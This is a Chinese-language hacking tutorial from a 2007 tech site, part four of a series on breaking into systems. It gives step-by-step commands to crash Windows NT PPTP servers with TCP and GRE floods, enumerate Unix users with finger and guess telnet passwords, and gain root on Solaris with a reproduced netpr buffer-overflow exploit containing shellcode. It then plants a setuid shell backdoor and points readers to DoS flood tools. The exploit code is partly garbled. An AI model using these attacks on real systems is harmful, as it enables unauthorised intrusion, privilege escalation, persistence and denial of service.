流行的漏洞入侵(四)
ReadyGo!技术成就梦想
网上整理
efish
2007-4-13 16:44:43
6 教你dos攻击微软的pptp
呵呵,大家没有看错,的确是微软的,我们先看看pptp是个什么东东pptp(piont-to-point tunneling protocol 点对点传输协议)是一个用以建立vpn的网络协议. 此协议需tcp(端口1723)和gre以完成工作.
易收攻击系统:
* dell poweredge 2200 with intel 10/100 adapter, 256 mb ram, nt server 4.0
* dell dimension xps m200s with 3com 905b adapter, 64 mb ram, nt server 4.0
安全的系统:
* hp vectra xa with amd pcnet integrated ethernet, 128 mb ram, nt workstation 4.0
* dell latitude cpx with 3com 3ccfem656 pc card adapter, 128 mb ram, nt workstation 4.0
* generic dual pii (asus motherboard) with 3com 980x adapter, 256 mb ram, nt server 4.0
* dell dimension xps t550 with 3com 905c-tx adapter, 128 mb ram, nt workstation 4.0
如何实现:
~~~~~~~~~
*需要的工具*
1.unix box(例如linux,*bsd....)
2.netcat ( )
3.apsend ( )
4.ipsend ( )
ok,这就好说了,
我们来看它的三个bug
1 tcp端口1723
此弱点只在prior至sp6的机器上有效。并不是所有的机器都存在这个漏洞;请在unix 操作系统内键入以下:
$ nc 1723 < /dev/zero
如机器存在此漏洞, 目标主机将在几秒种之内蓝屏,并有如下错误:
stop 0x0a (0x0, 0x2, 0x0, 0x0) irql_not_less_or_equal
再次提醒,此弱点只对部分机器有效
2 gre
此弱点对所有service pack有效
在目标机器上,打开任务管理器选择“运行”。并打开 一个dos窗口(开始-运行-cmd).在unix类操作系统上:
$ apsend -d --protocol 47 -m 0 -q
在目标主机上你将看到任务管理器内内核记忆的数字将缓慢上升。最终,这些数字将停止增加;此时, cpu在一段时间内有可能被100%占用。现在你可以试着在命令提示符后键入一个命令例如dir,这时你将看 到一个信息说提示操作系统已不可能完成要执行的命令
3弱点三:gre
此弱点同样对所有的service pack有效。请在unix操作系统上:
#!/bin/csh
foo:
ipsend -i -p gre > /dev/null
goto foo
目标主机很快会蓝屏,大概需要50个数据包。
明白了吧
7 unix攻击
这里为了方便我们用finger 0@ip 来找unix的薄弱机器
c:\>finger 0@ip
xxx.xxx.xxx.xxx]
login name tty idle when where
daemon ??? < . . . . >
bin ??? < . . . . >
sys ??? < . . . . >
jeffrey ??? pts/0 203.66.149.11
daniel ??? 437 114cm.kcable.
jamie ??? 0 203.66.162.68
postgres ??? pts/2 203.66.162.80
nsadmin ??? 768 203.66.19.50
ho ??? 390 61.169.209.106
house18 ??? pts/1 203.66.250.1
tong ??? pts/0 210.226. 42.69
jliu ??? pts/0 203.66.52.87
ptai ??? < . . . . >
看到了吗,这里的login下的就是我们要的用户名了
比如jeffrey,daniel,jamie,postgres
下面我们就来入侵
c:\>telnet xxx.xxx.xxx.xxx
一般的情况下我们都是猜密码,怎么猜??就是上面login下的用户名让它又做用户名和密码呀,事实上总有一些人为了方便是这么设置的
login: ptai (***输入用户名***)
password: **** (***输入密码***)
login incorrect (***登陆失败***)
login: jliu
password:
login incorrect
$ login: tong
password:
last login: mon jul 2 13:21:55 from 210.226. 42.69 (***这个用户上次登陆时的ip***)
sun microsystems inc. sunos 5.6 generic august 1997
you have mail. (***hoho~登陆成功啦***)
看看这不就进来了
$ uname –a (***查看系统版本和补丁信息***)
$ set (***查看一些系?潮淞啃畔?**)
$w 看看用户情况
$ gcc 我们看看有没有编辑器,以后你就知道有什么用了
gcc: no input files
看到没有gcc呀
$ ls -al
total 14
drwxrwxr-x 2 delex staff 512 jul 4 18:28 .
drwxr-xr-x 35 root root 1024 may 7 10:46 ..
-rw-r--r-- 1 delex staff 144 may 2 10:46 .profile
-rw------- 1 root staff 320 jul 4 18:52 .sh_history
-rw-r--r-- 1 delex staff 124 may 2 10:46 local.cshrc
-rw-r--r-- 1 delex staff 581 may 2 10:46 local.login
-rw-r--r-- 1 delex staff 562 may 2 10:46 local.profile
$ cat /etc/passwd (***检查/etc/passwd***)
root:x:0:1:super-user:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:admin:/var/adm:
lp:x:71:8:line printer admin:/usr/spool/lp:
uucp:x:5:5:uucp admin:/usr/lib/uucp:
nuucp:x:9:9:uucp admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:network admin:/usr/net/nls:
nobody:x:60001:60001:nobody:/:
noaccess:x:60002:60002:no access user:/:
nobody4:x:65534:65534:sunos 4.x nobody:/:
dennis:x:1005:20::/export/home/dennis:/bin/sh
oracle:x:1001:100::/export/home/oracle:/bin/sh
render7:x:9589:101::/export/home/render7:/bin/sh
$ ls -al / (***查看根目录是否有.rhosts等文件***)
计算机输入信息略
$ netstat -an|grep listen (***查看有没有可疑端口***)
*.111 *.* 0 0 0 0 listen
*.21 *.* 0 0 0 0 listen
*.23 *.* 0 0 0 0 listen
*.514 *.* 0 0 0 0 listen
*.513 *.* 0 0 0 0 listen
*.512 *.* 0 0 0 0 listen
*.540 *.* 0 0 0 0 listen
*.79 *.* 0 0 0 0 listen
*.37 *.* 0 0 0 0 listen
*.7 *.* 0 0 0 0 listen
*.9 *.* 0 0 0 0 listen
*.13 *.* 0 0 0 0 listen
*.19 *.* 0 0 0 0 listen
….
$ cd /tmp
$ ls -al
好像没有什么问题我们来提升权限
$ set
$ uname -a
sunos develop 5.7 generic_106541-14 sun4u sparc sunw,ultra-5_10
$ cd /tmp
$ cat > test.c (***用cat命令写一个文件***)
这是核心呀,这就是拿到root权限中重要的一步
*## copyright last stage of delirium dec 1999 poland *://lsd-pl.net/ #*/
/*## /usr/lib/lp/bin/netpr #*/
/* requires to specify the address of a host with 515 port opened */
#define nopnum 4000
#define adrnum 1200
#define allign 3
char shellcode */
"\xd0\x22\x20\x10" /* st %o0, */
"\xc0\x22\x20\x14" /* st %g0, */
"\x82\x10\x20\x0b" /* mov 0xb,%g1 */
"\x91\xd0\x20\x08" /* ta 8 */
"/bin/ksh"
;
char jump="\x80\x1c\x40\x11";
main(int argc,char **argv){
char buffer,adr,*b,*envp;
int i;
printf("copyright last stage of delirium dec 1999 poland //lsd-pl.net/\n");
printf("/usr/lib/lp/bin/netpr solaris 2.7 sparc\n\n");
if(argc==1){
printf("usage: %s lpserver\n",argv);
exit(-1);
}
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+7124+2000;
envp=&buffer;
envp=0;
b=&buffer;
sprintf(b,"xxx=");
b+=4;
for(i=0;i<1+4-((strlen(argv)%4));i++) *b++=0xff;
for(i=0;i
for(i=0;i
*b=0;
b=&buffer;
for(i=0;i
for(i=0;i
*b=0;
execle("/usr/lib/lp/bin/netpr","lsd","-i","bzz-z","-u","x!x","-d",argv,
"-p",&buffer,"/bin/sh",0,envp);
}
^d
(***这里是按ctrl + d 结束写文件,你用vi来写也可以,ftp,rcp等上传也可以。***)
(***源程序在 ***)
$ ls -al /tmp (***查看test.c是否建立***)
找到了吧,哪我们就成功的建立了
$ gcc -o test test.c 编辑它,使它溢出
$ ./test
copyright last stage of delirium dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
usage: ./test lpserver
$ ./test localhost
copyright last stage of delirium dec 1999 poland //lsd-pl.net/
/usr/lib/lp/bin/netpr solaris 2.7 sparc
# id
uid=1035(delex) gid=20(staff) euid=0(root) (***成功获得root***)
ok,想做什么就看你的了下面是一些题外话了
# mkdir /usr/lib/...
# cp /bin/ksh /usr/lib/…/.x (***做个简单的后门***)
# chmod +s /usr/lib/…/.x
# cat /etc/hosts (***看看这个网络多大***)
以下是在上面所要用到的扫描器和原代码
superscan 3.0
securecrt 3.3
里面所用到的有些程序代码请到 或 查找。
其实每个操作系统都有漏洞,简单的说我们只要找到该系统对应的漏洞然后编辑它,使它溢出就可以了,这也是黑客最常用的手法
8,d.o.s
呵呵,还记的对白宫的dos之战吗,呵呵,哪还不来试试
下载软件
fakeping的工具
下载 udpflood.zip
安装网址:
责任编辑: efish
参与评论
查找更多:
ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题ftp原因故障网络升级局域网服务器mail解决问题
-
相关文章
“小邮差”(worm.mimail.e) 新变..
病毒名称: worm.mimail.e 中文名称: 小邮差 威胁级别: 4c 受影响系统: win9x/nt/2k/xp/2003 病..
常用端口对照详解
端口:0 服务:reserved 说明:通常用于分析操作系统。这一方法能够工作是因为在一些系统中“0”是无效端 口..
给邮件一个家—otg公司发布邮件存..
● 邮件服务器每隔18天就会达到饱和 ● 企业用户平均每天花费2.5小时来管理邮箱 ● 81%的用户需要访问已经归..
e-mail存储备份解决方案
随着internet的迅速发展,网络用户的数量不断增多,许多事情都通过e-mail传输并最后确定。随着相关业务的不..
如何备份邮件服务器
邮件系统数据包括拥护注册数据和用户邮件数据两部分,利用rsync可以很容易实现邮件系统异地镜像和备份.本文是..
smtp压力测试工具:客户端程序sm..
smtp压力测试工具:客户端程序smtp-client.c /*++/* name/* smtp-sink 8/* summary/* multi-threaded smtp/..
2秒记住本站域名
玩过泡泡龙吗?Readygo?Go! 再加上.Com.Cn的后缀,那就是大名小顶的ReadyGo.com.cn